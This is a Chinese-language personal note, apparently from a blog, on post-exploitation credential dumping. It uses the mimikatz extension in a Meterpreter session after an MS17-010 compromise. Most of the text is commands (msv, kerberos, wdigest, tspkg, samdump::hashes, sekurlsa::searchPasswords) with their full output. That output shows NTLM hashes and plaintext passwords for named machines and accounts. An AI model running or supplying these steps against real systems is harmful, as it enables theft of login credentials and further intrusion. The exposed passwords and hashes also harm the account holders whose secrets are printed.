kali這方面不說了, meterpreter也略過, 做個關於mimikatz的筆記.
mimikatz模塊, 能獲取對方機器的密碼(包括哈希和明文).
滲透模塊怎么進的也不說了, 方式太多, 我用的是ms17-010
進去meterpreter后getuid一下(其他這個也沒多大用處,軍哥說進入meterpreter模式下 大部分情況下是擁有 system權限,無需 get system,但可能有些 權限管理嚴的 不一樣)
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
這獲得系統管理員權限
加載mimikatz模塊
meterpreter > load mimikatz Loading extension mimikatz...Success.
加載成功.
獲取登錄密碼的hash值
meterpreter > msv [+] Running as SYSTEM [*] Retrieving msv credentials msv credentials =============== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;334101 NTLM chenglee-PC chenglee lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 } 0;334068 NTLM chenglee-PC chenglee lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 } 0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO) 0;996 Negotiate WORKGROUP CHENGLEE-PC$ n.s. (Credentials KO) 0;49101 NTLM n.s. (Credentials KO) 0;999 NTLM WORKGROUP CHENGLEE-PC$ n.s. (Credentials KO)
上面已經是得到hash值了. 下面算明文密碼.
獲取明文密碼
meterpreter > kerberos [+] Running as SYSTEM [*] Retrieving kerberos credentials kerberos credentials ==================== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;996 Negotiate WORKGROUP CHENGLEE-PC$ 0;49101 NTLM 0;999 NTLM WORKGROUP CHENGLEE-PC$ 0;334101 NTLM chenglee-PC chenglee lizhenghua 0;334068 NTLM chenglee-PC chenglee lizhenghua
look...拿到登錄的明文密碼了.
不過也有一些特殊的情況, 例如這樣
meterpreter > kerberos [+] Running as SYSTEM [*] Retrieving kerberos credentials kerberos credentials ==================== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;10408969 NTLM CLOUDVM Administrator 0;266228 NTLM CLOUDVM Administrator 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;996 Negotiate WORKGROUP CLOUDVM$ 0;23595 NTLM 0;999 NTLM WORKGROUP CLOUDVM$
噢, 這是什么鬼兒...哈希值也獲取不到,
沒事, 下一步繼續,
使用另一種方式獲取哈希值
meterpreter > mimikatz_command -f samdump::hashes Ordinateur : chenglee-PC BootKey : 0648ced51b6060bed1a3654e0ee0fd93 Rid : 500 User : Administrator LM : NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0 Rid : 501 User : Guest LM : NTLM : Rid : 1000 User : chenglee LM : NTLM : 8d0f8e1a18236379538411a9056799f5
ok, 獲取到了,
根據上面的方式獲取明文密碼
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { chenglee ; chenglee-PC ; lizhenghua }
[1] { chenglee ; chenglee-PC ; lizhenghua }
[2] { chenglee ; chenglee-PC ; lizhenghua }
[3] { chenglee ; chenglee-PC ; lizhenghua }
[4] { chenglee-PC ; chenglee ; lizhenghua }
[5] { chenglee-PC ; chenglee ; lizhenghua }
meterpreter >
2
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; CLOUDVM ; 1244567 }
[1] { Administrator ; CLOUDVM ; 1244567 }
都拿到了
另外提一下更簡潔的方式,就是 wdigest命令了,
這個命令呢, 沒有上面的復雜,加載模塊后直接調用這個wdigest.
meterpreter > wdigest [+] Running as SYSTEM [*] Retrieving wdigest credentials wdigest credentials =================== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;996 Negotiate WORKGROUP CHENGLEE-PC$ 0;49101 NTLM 0;999 NTLM WORKGROUP CHENGLEE-PC$ 0;334101 NTLM chenglee-PC chenglee lizhenghua 0;334068 NTLM chenglee-PC chenglee lizhenghua
還有一個跟wdigest一樣牛的就是tspkg啦
meterpreter > tspkg [+] Running as SYSTEM [*] Retrieving tspkg credentials tspkg credentials ================= AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;996 Negotiate WORKGROUP CHENGLEE-PC$ 0;49101 NTLM 0;999 NTLM WORKGROUP CHENGLEE-PC$ 0;334101 NTLM chenglee-PC chenglee lizhenghua 0;334068 NTLM chenglee-PC chenglee lizhenghua
簡直就是一擊斃命有木有...